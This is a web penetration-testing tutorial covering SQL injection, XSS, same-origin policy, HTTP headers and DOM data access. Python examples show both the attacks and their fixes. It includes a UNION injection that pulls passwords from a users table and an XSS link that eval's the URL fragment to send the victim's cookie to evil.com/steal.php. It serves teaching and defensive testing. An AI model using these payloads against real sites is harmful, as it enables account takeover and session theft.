Summary of Web Front-end Penetration Testing Technology (I)

Source: Internet
Author: User

First of all, keep the right attitude: do not break the law.

1. SQL injection Test

For a page that is vulnerable to SQL injection, a UNION query is injected through the request parameter (the query itself is assembled on the server side, client/server style). Example: http://www.foo.com/user.php?id=1

URLs like this are common. Submitted as is, the server returns only the general information for id=1. A database UNION query can be appended, for example http://www.foo.com/user.php?id=1 union select password,1,a from users, so that the back-end statement becomes ... where id=1 union select password,1,a from users. Such a statement is still legal SQL: an application with a SQL injection flaw treats it as a legitimate query and returns the contents of the password column of users alongside the normal result. The leaked account name and password can then be tried against the login.
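The following is an added example, not code from the original write-up or from any real site, that reproduces the UNION attack above against a constructed in-memory SQLite table and puts the parameterised version of the same lookup next to it. The schema (id, name, password), the three-column SELECT and the sample rows are assumptions; the payload uses the literal 1 as its third column so the column count matches (the page shows password,1,a).

```python
import sqlite3


# Constructed stand-in for the page's `users` table (assumed schema:
# id, name, password). Not the original site's code.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "s3cret"), (2, "bob", "hunter2")],
    )
    return conn


def vulnerable_lookup(conn, user_id):
    """What user.php?id=... does wrong: the parameter is pasted into the SQL
    text. The SELECT has three columns, so a UNION payload must supply three."""
    sql = "SELECT id, name, 'public' FROM users WHERE id=" + user_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_id):
    """Same query with a bound parameter: the value is never parsed as SQL."""
    sql = "SELECT id, name, 'public' FROM users WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall()


# The page's payload, third column set to the literal 1 so the column count
# matches the SELECT above (assumption; the page shows `password,1,a`).
UNION_PAYLOAD = "1 union select password,1,1 from users"


def leaked_passwords(rows):
    """Values the UNION smuggled into the first (id) column, sorted."""
    return sorted(r[0] for r in rows if isinstance(r[0], str))


if __name__ == "__main__":
    db = make_db()
    print("normal:   ", vulnerable_lookup(db, "1"))
    print("injected: ", vulnerable_lookup(db, UNION_PAYLOAD))
    print("leaked:   ", leaked_passwords(vulnerable_lookup(db, UNION_PAYLOAD)))
    print("parameterised, same payload:", safe_lookup(db, UNION_PAYLOAD))
```

With the bound parameter the whole payload is compared against the integer id column as one text value and matches nothing; the password column never leaves the table.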

2. XSS Cross-site scripting attack

First, an explanation of the cross-site script. Example: <script>eval(location.hash.substr(1));</script> saved in http://www.foo.com/info.html. The JavaScript built-in eval executes a string as JavaScript code at run time; location.hash returns the part of the URL after the # (for http://www.foo.com/info.html#callback it is #callback); substr is the string-slicing function, so location.hash.substr(1) drops the leading # and whatever follows is executed by eval.

Now construct the XSS link: http://www.foo.com/info.html#new%20Image().src="http://evil.com/steal.php?c="+escape(document.cookie). The browser runs the script behind the # as eval('new Image().src="http://evil.com/steal.php?c="+escape(document.cookie)'), which sends the victim's cookie cross-site to evil.com. With that cookie the attacker can log in as the victim and perform unauthorized operations. One caveat: current browsers return location.hash still percent-encoded, so the %20 is not turned into a space before eval sees it; the payload as written relies on a browser that decodes the fragment.
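As an added example (not part of the original post), the script below models what the vulnerable page hands to eval for the two links above, under both fragment-decoding behaviours, shows the allowlist check that a callback parameter should pass instead of being eval'd, and reproduces the exfiltration URL that the injected new Image() would request with a given document.cookie. The identifier allowlist and the Latin-1 restriction on the escape() model are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, unquote, quote

# The two links from the page.
BENIGN_LINK = "http://www.foo.com/info.html#callback"
XSS_LINK = ('http://www.foo.com/info.html#new%20Image().src='
            '"http://evil.com/steal.php?c="+escape(document.cookie)')


def string_handed_to_eval(url, decode_fragment=True):
    """Model eval(location.hash.substr(1)): the fragment without the '#'.
    decode_fragment=True models a browser that percent-decodes location.hash
    (what the page's payload relies on); False models current browsers,
    which return the fragment still percent-encoded."""
    fragment = urlsplit(url).fragment
    return unquote(fragment) if decode_fragment else fragment


# What the page should do instead of eval: accept only a plain identifier as
# the callback name (allowlist; an assumption of this example).
_CALLBACK_NAME = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]{0,63}$")


def is_safe_callback(name):
    return _CALLBACK_NAME.fullmatch(name) is not None


def js_escape(text):
    """JavaScript's legacy escape() for Latin-1 input: alphanumerics and
    @*_+-./ are kept, everything else becomes %XX."""
    return quote(text, safe="@*_+-./", encoding="latin-1")


def exfil_url(document_cookie):
    """The URL the injected new Image().src requests on evil.com."""
    return "http://evil.com/steal.php?c=" + js_escape(document_cookie)


if __name__ == "__main__":
    print(string_handed_to_eval(BENIGN_LINK))
    print(string_handed_to_eval(XSS_LINK))
    print(string_handed_to_eval(XSS_LINK, decode_fragment=False))
    print(is_safe_callback("callback"),
          is_safe_callback(string_handed_to_eval(XSS_LINK)))
    print(exfil_url("sessionid=58ab420b1d8b800526acccaa83a827a3:fg=1"))
```

The cookie value used in the last call is the sessionid from the request capture further down the page; it is the kind of value that lands in the attacker's steal.php log.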

3. Same-origin policy

Client-side scripts from different origins cannot read or write each other's resources without authorization.

Same origin means the same protocol, the same domain name and the same port; when two sites are said to be "in the same domain", this same-origin relationship is what is meant.

Client-side script mainly means JavaScript and ActionScript (the Flash scripting language); both follow the ECMAScript standard, and Flash provides a communication interface through which the two can call each other. Ajax is worth mentioning here as well: it transfers data asynchronously in the background, so back-end data can be read and modified without reloading the page.

Authorization means that the target site explicitly returns the HTTP response header Access-Control-Allow-Origin: http://www.evil.com; only then can Ajax code running on www.evil.com read and write data on www.foo.com.

Read and write permissions: different resources carry different permissions for script. The HTTP Referer header is read-only, whereas document.cookie can be both read and written.

Resources means only the resources the policy guards: HTTP headers, the whole DOM tree, and browser storage (cookies, Flash cookies, localStorage).
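As an added example (not from the original post), the code below applies the protocol/host/port rule above to URLs and then decides whether a script on one origin may read a cross-origin response, using the Access-Control-Allow-Origin header the section describes. The handling of default ports, the wildcard and the credentials flag follows the CORS rules browsers apply; the header dictionaries and example URLs are constructed for the demonstration.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """(scheme, host, port) with the default port filled in, the triple the
    same-origin policy compares."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    port = p.port if p.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, (p.hostname or "").lower(), port)


def same_origin(url_a, url_b):
    return origin(url_a) == origin(url_b)


def serialize_origin(url):
    """Origin in the form a browser sends in Origin: and compares against
    Access-Control-Allow-Origin (no default port, no path)."""
    scheme, host, port = origin(url)
    if port == DEFAULT_PORTS.get(scheme):
        return f"{scheme}://{host}"
    return f"{scheme}://{host}:{port}"


def cors_allows_read(response_headers, requesting_url, with_credentials=False):
    """May a script at requesting_url read a response carrying these headers?
    Without Access-Control-Allow-Origin the same-origin policy blocks it;
    '*' is accepted only for requests made without cookies/credentials;
    an explicit origin must match exactly, plus Allow-Credentials: true
    when credentials were sent."""
    hdrs = {k.lower(): v.strip() for k, v in response_headers.items()}
    acao = hdrs.get("access-control-allow-origin")
    if acao is None:
        return False
    if acao == "*":
        return not with_credentials
    if acao != serialize_origin(requesting_url):
        return False
    if with_credentials:
        return hdrs.get("access-control-allow-credentials", "").lower() == "true"
    return True


if __name__ == "__main__":
    print(same_origin("http://www.foo.com/user.php?id=1", "http://www.foo.com:80/info.html"))
    print(same_origin("http://www.foo.com/", "https://www.foo.com/"))
    # The header from the section, as seen by a script on www.evil.com.
    print(cors_allows_read({"Access-Control-Allow-Origin": "http://www.evil.com"},
                           "http://www.evil.com/attack.html"))
```

Note that a site which echoes the request's Origin into Access-Control-Allow-Origin together with Allow-Credentials: true is effectively granting every origin the read access the section warns about; the check above would report True for any requesting URL against such a response.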

4. HTTP protocol

In packet-capture analysis the HTTP connection is often seen to be closed immediately or after a short delay, so each request has to set up a new connection. The Connection: keep-alive request header and the Keep-Alive: timeout=5, max=100 response header in the exchange below are how client and server negotiate reusing one connection (here for at most 100 requests, idle for at most 5 seconds).

GET http://www.foo.com/ HTTP/1.1

Host: www.foo.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.3 Safari/535.19
Referer: http://www.baidu.com/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-cn,zh;q=0.8
Accept-Charset: gbk,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=58ab420b1d8b800526acccaa83a827a3:fg=1

The response is as follows:
HTTP/1.1 200 OK
Date: Sun, 22:48:31 GMT
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Set-Cookie: ptoken=; Expires=Mon, 1970 00:00:00 GMT; path=/; domain=.foo.com; HttpOnly
Set-Cookie: USERID=C7888882E039B32FD7B4D3; Expires=Tue, Jan 2030 00:00:00 GMT; path=/; Domain=.foo.com
X-Powered-By: PHP/5.2.6
Content-Length: 3635
Keep-Alive: timeout=5, max=100
Connection: keep-alive
Content-Type: text/html;charset=gbk
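The response above is worth reading with the XSS section in mind: ptoken is being cleared (empty value, 1970 expiry) and carries HttpOnly, while USERID is set for .foo.com without HttpOnly or Secure, so it is exactly what document.cookie would hand to a stealing script. The following added example (not code from the original post) parses those header lines, which are embedded as printed on the page with its partially garbled dates, reports the flags of each cookie, and reads the Keep-Alive parameters mentioned above. The parser is deliberately minimal and is an assumption of this example, not a library API.

```python
# Response headers as printed on the page (dates are carried over as they
# appear there; the audit only looks at cookie flags and keep-alive values).
RESPONSE_HEADERS = [
    "Date: Sun, 22:48:31 GMT",
    "Server: Apache/2.2.8 (Win32) PHP/5.2.6",
    "Set-Cookie: ptoken=; Expires=Mon, 1970 00:00:00 GMT; path=/; domain=.foo.com; HttpOnly",
    "Set-Cookie: USERID=C7888882E039B32FD7B4D3; Expires=Tue, Jan 2030 00:00:00 GMT; path=/; Domain=.foo.com",
    "X-Powered-By: PHP/5.2.6",
    "Content-Length: 3635",
    "Keep-Alive: timeout=5, max=100",
    "Connection: keep-alive",
    "Content-Type: text/html;charset=gbk",
]


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into name, value, boolean flags and the
    remaining attributes (keys lower-cased). Splitting on ';' is safe here
    because the comma inside Expires is not a separator in Set-Cookie."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = {"name": name.strip(), "value": value.strip(),
              "httponly": False, "secure": False, "attrs": {}}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key = key.strip().lower()
        if key == "httponly":
            cookie["httponly"] = True
        elif key == "secure":
            cookie["secure"] = True
        elif key:
            cookie["attrs"][key] = val.strip()
    return cookie


def audit_cookies(header_lines):
    """{cookie name: parsed cookie} for every Set-Cookie line in a response."""
    result = {}
    for line in header_lines:
        field, _, value = line.partition(":")
        if field.strip().lower() == "set-cookie":
            cookie = parse_set_cookie(value)
            result[cookie["name"]] = cookie
    return result


def script_readable(cookies):
    """Names of cookies that document.cookie exposes to script (no HttpOnly)."""
    return sorted(name for name, c in cookies.items() if not c["httponly"])


def keepalive_params(header_lines):
    """Timeout and max from the Keep-Alive response header, as integers."""
    for line in header_lines:
        field, _, value = line.partition(":")
        if field.strip().lower() == "keep-alive":
            params = {}
            for item in value.split(","):
                key, _, val = item.partition("=")
                params[key.strip().lower()] = int(val.strip())
            return params
    return {}


if __name__ == "__main__":
    cookies = audit_cookies(RESPONSE_HEADERS)
    for name, c in cookies.items():
        print(f"{name}: HttpOnly={c['httponly']} Secure={c['secure']} "
              f"domain={c['attrs'].get('domain')} expires={c['attrs'].get('expires')}")
    print("readable from document.cookie:", script_readable(cookies))
    print("keep-alive:", keepalive_params(RESPONSE_HEADERS))
```

Running this against a target's responses during a test is a quick way to list which session cookies an XSS would actually be able to steal; anything in script_readable that functions as a session identifier should be reported.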

5. The IFRAME tag is an important HTML tag and the one met most often in web security work: many sites embed third-party content, such as advertising pages, through it.

6. Privacy acquisition: JavaScript can be used to read the corresponding values out of the page. document.getElementById('private_msg').innerHTML returns the HTML content inside the element with that id. The DOM can also be queried by tag name: document.getElementsByTagName('div')[2].innerHTML; getElementsByTagName takes a tag name and returns an array-like collection of the matching elements. The cookie value can be obtained the same way, through document.cookie.

You only regret how little you have learned when the time comes to use it ...

